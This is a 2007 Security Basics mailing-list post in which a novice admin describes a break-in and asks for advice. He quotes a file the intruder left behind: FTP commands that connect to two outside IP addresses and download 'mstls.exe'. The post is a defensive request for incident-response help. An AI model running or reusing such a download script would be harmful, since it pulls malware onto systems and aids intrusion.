Security Basics mailing list archives
what next
From: nemanja.janic () centroproizvod co yu
Date: 6 Feb 2007 11:38:26 -0000
Hello list, i wasn't sure where to post this, and since i'm just starting out in security, i figured that this is the place. Here goes: i've had a fine unknown gentleman enter at his will to my server; among other things he left behind a file named tt (no extension) which contained the following lines: open 80.93.223.22 14547 user 1 1 get mstls.exe quit open 80.71.219.134 5191 user 1 1 get mstls.exe quit I figure this is some script to be used with ftp, or at least i think so. I did tracert to those adresses, but that's where i'm stuck. What can i do next? And any idea what that mstls.exe is? I deleted it, but it was 0 bytes in size. Thanx in advance.
Current thread:
- what next nemanja . janic (Feb 06)
- Re: what next Justin (Feb 06)
- RE: what next Murda Mcloud (Feb 07)
- RE: what next Devin Rambo (Feb 07)
- RE: what next Roger A. Grimes (Feb 07)
- Re: what next jhori (Feb 07)
- Re: what next etropos (Feb 07)
- <Possible follow-ups>
- Re: what next hackman (Feb 06)
- Re: what next RunandHide (Feb 06)
- Re: RE: what next nemanja . janic (Feb 07)
- Re: Re: RE: what next nemanja . janic (Feb 12)
- Re: what next Justin (Feb 06)